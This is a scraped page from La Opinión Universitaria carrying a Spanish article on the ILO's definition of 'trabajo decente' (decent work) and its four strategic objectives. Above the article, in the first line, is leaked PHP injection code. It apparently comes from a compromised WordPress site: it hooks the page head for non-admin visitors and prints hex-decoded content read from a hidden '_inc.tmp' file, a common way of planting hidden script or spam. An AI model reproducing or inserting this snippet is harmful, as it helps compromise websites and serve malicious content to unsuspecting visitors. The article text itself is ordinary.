if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } EL MUNDO LABORAL DE LOS JÓVENES – La Opinión Universitaria La Opinión Universitaria
Menu

EL MUNDO LABORAL DE LOS JÓVENES

Trabajo decente

Por Alejandra Ajuria

El concepto de trabajo decente se empleó por primera vez en 1999 en la Memoria del Director General de la Organización Internacional del Trabajo (OIT) en la 87a Reunión de la Conferencia Internacional del Trabajo, y se define de la siguiente forma:

“El trabajo decente resume las aspiraciones de la gente durante su vida laboral. Significa contar con oportunidades de un trabajo que sea productivo y que produzca un ingreso digno, seguridad en el lugar de trabajo y protección social para las familias, mejores perspectivas de desarrollo personal e integración a la sociedad, libertad para que la gente exprese sus opiniones, organización y participación en las decisiones que afectan sus vidas, e igualdad de oportunidad y trato para todas las mujeres y hombres”.

Estos aspectos del trabajo decente se han sintetizado en cuatro objetivos estratégicos: promover y aplicar las normas, los principios y derechos fundamentales en el trabajo; crear mayores oportunidades para que mujeres y hombres puedan tener empleos e ingresos dignos; mejorar la cobertura y la eficacia de una protección social para todos, y fortalecer el tripartismo y el diálogo social.

Para que un trabajo sea considerado decente, debe ser: productivo, justamente remunerado, realizado en condiciones de libertad, equidad y seguridad y realizado con respeto a la dignidad humana. Para que un empleo sea productivo debe caracterizarse por niveles de productividad laboral que permiten la generación de ingresos que contribuyan a la superación de la pobreza. Para ello se requiere, entre otros factores, que los trabajadores tengan una buena formación al ingresar al mercado de trabajo y que, una vez en el empleo, continúen capacitándose en forma permanente. El nivel educativo y la capacitación en el trabajo son así dos dimensiones del trabajo decente.

Debemos tener en cuenta que el empleo abarca toda clase de trabajo, eso quiere decir que el “trabajo decente” no es privativo de ciertos trabajos, sino que abarca tanto a los trabajadores de la economía regular como para los trabajadores asalariados de la economía informal, los trabajadores independientes y los que trabajan a domicilio. Se reconoce que el trabajo decente es un concepto con varios componentes, complejo, cuya medición requiere de un conjunto de indicadores o estadísticas.

 

No comments

Deja una respuesta

Tweets recientes